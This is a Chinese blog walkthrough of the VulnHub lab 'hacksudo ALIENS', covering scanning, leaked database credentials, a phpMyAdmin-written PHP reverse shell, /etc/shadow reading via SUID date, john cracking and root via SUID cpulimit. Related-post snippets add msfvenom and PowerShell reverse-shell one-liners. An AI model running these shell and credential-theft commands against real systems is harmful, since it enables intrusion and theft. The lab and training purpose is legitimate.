靶机练习 aliens phpmyadmin拿shell date命令提权

最新推荐文章于 2025-05-07 07:56:38 发布
原创 最新推荐文章于 2025-05-07 07:56:38 发布 · 3.7k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux #web安全

在这里插入图片描述

靶机信息

下载地址:

https://www.vulnhub.com/entry/hacksudo-aliens,676/

名称: hacksudo系列ALIENS

靶场: VulnHub.com

难度: 简单

发布时间: 2021年4月4日

提示信息: 无

目标: user.txt和root.txt

实验环境

攻击机:VMware  kali    192.168.7.3

靶机:Vbox     linux   IP自动获取

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 192.168.7.1/24

image-20220125195123164

扫描到靶机地址为192.168.7.122

端口扫描

端口扫描是扫描目标机器所开放的服务

sudo nmap -sC -sV -p- 192.168.7.122 -oN aliens.nmap

image-20220125195303179

扫描到3个开放的端口22(SSH),80(HTTP)和9000(HTTP),先从80开始入手

Web渗透

访问80

http://192.168.7.122

image-20220125195810451

是一个目击外星人数据的网站,未发现敏感信息,做个目录扫描

目录扫描

dirsearch -u http://192.168.7.122 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20220125201334857

扫描到2个目录,看看backup这个目录下面有什么

image-20220125201410630

发现一个mysql备份文件,下载下来看看

wget http://192.168.7.122/backup/mysql.bak
cat mysql.bak

image-20220125201651616

发现数据库帐号和密码

user=vishal
password=hacksudo

没有其他可利用的信息了,再来看看9000端口

http://192.168.7.122:9000

image-20220125201946748

原来是phpMyAdmin(mysql数据库管理工具),用刚才获取到的帐号密码登录试试

image-20220125205224234

phpMyAdmin写入shell

登录成功,试试有没有写权限,我们直接写个反弹shell的脚本

select "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 4444 >/tmp/f');?>" into outfile "/var/www/html/s.php"

image-20220125211705749

image-20220125211740745

写入成功,验证一下

反弹shell

kali攻击机监听4444端口

nc -lvvp 4444

image-20220125210930130

web上执行payload

http://192.168.7.122/shell.php

image-20220125212003404

反弹成功,切换完整的交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xter
Ctrl+z

image-20220125212208975

stty -a

image-20220125212243981

stty raw -echo;fg
reset

image-20220125212401165

stty rows 20 columns 82

image-20220125212434023

切换完成,干正事,查找一切可利用的敏感信息

/var/backups目录下发现4个root权限的备份文件,但是没有权限查看,继续找

image-20220125212818268

find / -perm -u=s -type f 2>/dev/null

image-20220125213514314

发现个/usr/bin/date有s权限,我们可以利用这个命令读取文件

/usr/bin/date -f /etc/shadow

image-20220125214933106

发现两个帐号有密码,把他们保存到kali攻击机上

vi passwd.txt

image-20220125215139486

还需要处理一下格式,将前面多余的内容,和最后的单引号去掉

image-20220125215452802

处理好了,现在开始暴破密码

john passwd.txt

image-20220125220732668

拿到hacksudo帐号的密码aliens,登录ssh

ssh hacksudo@192.168.7.122

image-20220125221253218

登录成功,找找可利用的敏感信息

/home/hacksudo/Desktop目录下找到user.txt

cd /home/hacksudo/Desktop
ls
cat user.txt

image-20220125222108281

cpulimit提权

/home/hacksudo/Desktop目录下发现cpulimit文件有s权限

cd /home/hacksudo/Download
ls -al

image-20220125222259726

这个程序是可以提权的

./cpulimit -l 100 -f -- /bin/sh -p

image-20220125222921945

提权成功,查看最后一个flag

cd /root
ls -al
cat root.txt

image-20220125223116818

OK,拿到root.txt,游戏结束
在这里插入图片描述
在这里插入图片描述

Web渗透测试对靶机注入shellphpMyAdmin
SYJ_361的博客
12-15 3972
在服务器中寻找目标靶机,对靶机进行渗透。这里用到了kali和中国蚁剑对目标进行渗透,用burpsuite对目标登录页面进行暴力破解账号和密码。
靶机bulldog2练习:通过反弹shell进行
7Riven's blog
11-22 1066
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149 扫描网段:发现有主机IP地址为192.168.109.149,存活 扫描发现目标的目标主机信息如下: -sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...
phpMyAdmin
Clannad的博客
01-10 1831
文章目录条件 条件 1、secure_file_priv的值不为NULL
SUDO的15重方法
最新发布
2303_77008280的博客
05-07 1100
Linux
phpmyadmin mysql_phpMyadmin技巧
weixin_26795171的博客
01-28 538
定义phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。环境准备目标:WindowsServer2003Enterprisex64Edition192.168.17.137攻击机:window7192.168.17.132Php:5.45Mysql:5.5.53Apac...
date命令详解
weixin_34001430的博客
10-03 165
为什么80%的码农都做不了架构师?>>> ...
Vulnhub靶机测试 No.31 hacksudoAliens
YouthBelief的博客
04-12 755
hacksudoAlienshacksudoAliens1 靶机介绍2 测试过程2.1 nmap探测ip2.2 nmap扫描端口2.3 测试思路2.4 80端口探测2.5 gobuster目录枚举2.6 翻目录2.7 查看mysql.bak2.8 9000端口phpmyadmin登录2.9 蚁剑连接2.10 反弹shell2.11 切换完整终端3 3.1 信息收集3.1.1 用户信息收集3.1.2 suid信息收集3.2 suid限的date读取shadow3.3 john 破解ssh密码3.4 su
靶机DC-2练习:通过rbash绕过获取shell,使用git命令
7Riven's blog
12-24 1920
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
靶机zico2练习:数据库插入反弹语句获取shell,脏牛,清除痕迹,留后门
7Riven's blog
01-29 1009
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid
7Riven's blog
12-10 2656
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
靶机DC-3练习:使用weevely生成webshell并连接获取shell,通过Ubuntu16.04版本漏洞
7Riven's blog
12-25 1535
1.主机发现 2.扫描端口服务版本 3.访问80端口 4.扫描后台目录 分别访问,除了空白页、首页、就是404页面,只发现下面入口 发现Joomla疑似cms,查看敏感文件 搜索该版本cms有没有什么漏洞 也可以用joomscan扫描 ……同样存在sql注入 存在sql注入,根据路径查看文件 5.直接使用sqlmap工具跑库名 sql...
phpmyadmin
cc1988429的专栏
10-13 911
一: 暴路径: libraries/lect_lang.lib.php themes/darkblue_orange/layout.inc.php 二: 选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(''''); sel
phpmyadmin——
weixin_53639243的博客
01-29 814
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置。用于 secur_file_priv 为null 或限定值 不在网页目录时。执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。2.secure_file_priv 不为null 具体描述在下边。general_log_file:日志保存路径。3.要知道网站的绝对路径,写入马才能连接。
phpmyadmin getshell
KHOST的博客
03-16 765
一. 环境准备: 靶机:win7 32 位。 环境: php:5.45 MYsql:5.5.53 Apache:2.4s 二. 开始攻击。 访问目标站点,发现开启3306 端口, 经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root 1.开始登陆到目标服务器的PhpMyadmin 2.检测MySQL全局变量(generallog、gen...
phpmyadmin通过日记
qq_36034274的博客
08-26 3724
phpmyadmin弱口令经常见到,今天我介绍下phpmyadmin如何。 首先, phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 安装过程中,默认路径是WWW/phpmyadmin 获取相关信息: 可以看到,这是phpstudy的集成环境,一般的安装路径就是 磁盘/文件...
Phpmyadmin的一次渗透测试
weixin_30715523的博客
06-07 710
首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getsh...
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3536
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
PhpMyadmin利用源代码及root账号泄露漏洞秒获系统
weixin_44023460的博客
12-08 1768
Simeon Phpmyadmin是一款著名的mysql在线管理系统,通过供的mysql数据库用户账号和密码对所管理的数据库实施各种操作。在渗透过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell限和系统限。在前面的专题中,分别介绍了phpmyadmin网站真实路径信息获取、批量获取phpmyadmin信息、phpmyadmin ...
windows靶机反弹shell
02-19
### Windows 靶机反弹 Shell方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值